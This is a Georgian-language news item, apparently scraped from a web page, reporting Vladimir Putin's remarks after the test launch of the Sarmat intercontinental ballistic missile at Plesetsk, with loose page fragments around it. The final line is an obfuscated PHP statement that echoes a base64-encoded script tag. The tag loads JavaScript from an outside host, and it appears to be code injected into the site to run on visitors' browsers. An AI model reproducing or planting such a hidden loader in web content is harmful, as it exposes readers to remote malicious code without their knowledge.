celsiusi
ავერსი საქკაბელი
რუსეთის პრეზიდენტმა, ვლადიმერ პუტინმა საკონტინენტთაშორისო ბალისტიკური რაკეტის – ,,სარმატი" გამოცდის შემდეგ განაცხადა, რომ ახალი კონტინენტთაშორისი ბალისტიკური რაკეტა საიმედოდ უზრუნველყოფს რუსეთის უსაფრთხოებას გარე საფრთხეებისგან. 
 
მისივე თქმით, ახალი რაკეთის არსებობა, ორჯერ დაფიქრებას აიძულებს მათ, ვინც გაცხარებული, აგრესიული რიტორიკით ცდილობს რუსეთს დაემუქროს.
 
„გილოცავთ საკონტინენტთაშორისო ბალისტიკური რაკეტის „სარმატის“ წარმატებით გაშვებას. ეს მართლაც უნიკალური იარაღი გააძლიერებს ჩვენი შეიარაღებული ძალების საბრძოლო პოტენციალს, საიმედოდ უზრუნველყოფს რუსეთის უსაფრთხოებას გარე საფრთხეებისგან და ორჯერ დაფიქრებას აიძულებს მათ, ვინც გაცხარებული აგრესიული რიტორიკით ცდილობს ჩვენ ქვეყანას დაემუქროს“, - აღნიშნა პუტინმა.
 
მედიის ინფორმაციით, „სარმატს“ დასავლელმა ანალიტიკოსებმა „სატანა 2“ უწოდეს და ის რუსეთის შემდეგი თაობის რაკეტებს შორისაა, რომელსაც პუტინმა "უძლეველი" უწოდა. იგი საბჭოთა ეპოქის Voevoda ICBM-ის ჩასანაცვლებლადაა შექმნილი.
 
რუსეთის თავდაცვის სამინისტროს ცნობით, ბალისტიკური რაკეტის გამოცდა ჩრდილოეთ რუსეთში, პლესეცკის კოსმოდრომზე ჩატარდა.
 
უწყების ინფორმაციით, "სარმატი" მსოფლიოში ყველაზე მძლავრი რაკეტაა სამიზნეების განადგურების ყველაზე დიდი დიაპაზონით და მნიშვნელოვნად გაზრდის ქვეყნის სტრატეგიული ბირთვული ძალების საბრძოლო ძალას.
1424
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");